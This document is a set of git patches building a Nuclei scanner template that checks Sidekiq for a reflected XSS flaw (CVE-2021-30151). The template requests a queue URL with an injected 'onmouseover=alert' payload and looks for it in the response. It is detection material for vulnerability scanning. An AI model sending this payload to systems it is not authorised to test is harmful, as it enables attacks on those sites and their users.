From e87a0671ee6e2911430cbdf3ff1f580cad636084 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 10 Apr 2021 22:58:27 +0530 Subject: [PATCH 1/7] Create CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2021/CVE-2021-30151.yaml diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml new file mode 100644 index 0000000000..ece49be0ea --- /dev/null +++ b/cves/2021/CVE-2021-30151.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-30151 + +info: + name: CVE-2021-30151 + author: DhiyaneshDk + severity: low + description: | + Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. + reference: | + - https://github.com/mperham/sidekiq/issues/4852 + - + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert('nuclei')"' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "onmouseover="alert('nuclei')" + - type: word + part: header + words: + - "text/html" From 3e3db1c972df90dcec41f4767ab5335c5e618492 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 10 Apr 2021 23:37:38 +0530 Subject: [PATCH 2/7] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index ece49be0ea..05462a7be6 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -8,7 +8,7 @@ info: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. reference: | - https://github.com/mperham/sidekiq/issues/4852 - - + - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 tags: cve,cve2021,xss requests: From 1e0b6ea3839c5c2487d8865aec6030e02531ee46 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 10 Apr 2021 23:43:37 +0530 Subject: [PATCH 3/7] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 05462a7be6..b9f5a033f8 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -14,7 +14,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert('nuclei')"' + - '{{BaseURL}}/sidekiq/queues/%22onmouseover%3D%22alert(%27nuclei%27)%22' matchers-condition: and matchers: From 1692ef18218026572b5566e1427cbaf7cb257677 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 10 Apr 2021 23:47:02 +0530 Subject: [PATCH 4/7] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index b9f5a033f8..0fed61b3c7 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -14,8 +14,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/sidekiq/queues/%22onmouseover%3D%22alert(%27nuclei%27)%22' - + - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"' matchers-condition: and matchers: - type: word From 4c9cbc169234a9dabc65b0a370ecc277194b4cc9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Apr 2021 00:57:38 +0530 Subject: [PATCH 5/7] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 0fed61b3c7..4f78422672 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -5,7 +5,7 @@ info: author: DhiyaneshDk severity: low description: | - Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. + - Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. reference: | - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 From 43e59a577e16769d0809b2fd9c06eac6924dbda4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Apr 2021 01:00:49 +0530 Subject: [PATCH 6/7] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 4f78422672..f9fc1c8820 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -4,8 +4,7 @@ info: name: CVE-2021-30151 author: DhiyaneshDk severity: low - description: | - - Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. + description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. reference: | - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 @@ -20,7 +19,7 @@ requests: - type: word part: body words: - - "onmouseover="alert('nuclei')" + - "onmouseover=\"alert('nuclei')" - type: word part: header words: From b0b45dd599b81dc911385c94ab87051eb0202e2a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 17:51:41 +0530 Subject: [PATCH 7/7] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index f9fc1c8820..9f93b76ad6 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -8,7 +8,7 @@ info: reference: | - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 - tags: cve,cve2021,xss + tags: cve,cve2021,xss,sidekiq requests: - method: GET @@ -20,7 +20,12 @@ requests: part: body words: - "onmouseover=\"alert('nuclei')" + - type: word part: header words: - "text/html" + + - type: status + status: + - 200 \ No newline at end of file